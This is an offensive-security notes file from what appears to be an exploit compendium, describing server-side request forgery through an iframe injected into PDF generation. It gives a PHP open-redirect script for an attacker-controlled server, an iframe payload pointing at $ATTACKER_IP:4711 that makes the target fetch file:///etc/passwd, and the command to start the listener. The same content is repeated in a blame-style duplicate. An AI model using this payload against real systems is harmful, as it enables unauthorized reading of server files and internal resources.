killchain-compendium/Exploits/Web/Iframe.md

# SSRF through iframe

* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)
* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server
```php
<?php
$loc = "http://127.0.0.1/";

if(isset($_GET['a'])){
    $loc = $_GET['a'];
}
header('Location: '.$loc);
?>
```
* Payload looks like this
```html
<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>
```
* Start a php adhoc server and run it
```php
php -S 0.0.0.0:4711
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# SSRF through iframe`

			`* [taken from Jomar's Website](https://www.jomar.fr/posts/2021/ssrf_through_pdf_generation/)`
			`* Upload iframe with attacker server and php code ready to be executed. Redirect to a local file on the server`
			```php
			`<?php`
			`$loc = "http://127.0.0.1/";`

			`if(isset($_GET['a'])){`
			`$loc = $_GET['a'];`
			`}`
			`header('Location: '.$loc);`
			`?>`
			```
			`* Payload looks like this`
			```html
			`<iframe src="http://$ATTACKER_IP:4711/ssrf.php?a=file:///etc/passwd"/>`
			```
			`* Start a php adhoc server and run it`
			```php
			`php -S 0.0.0.0:4711`
			```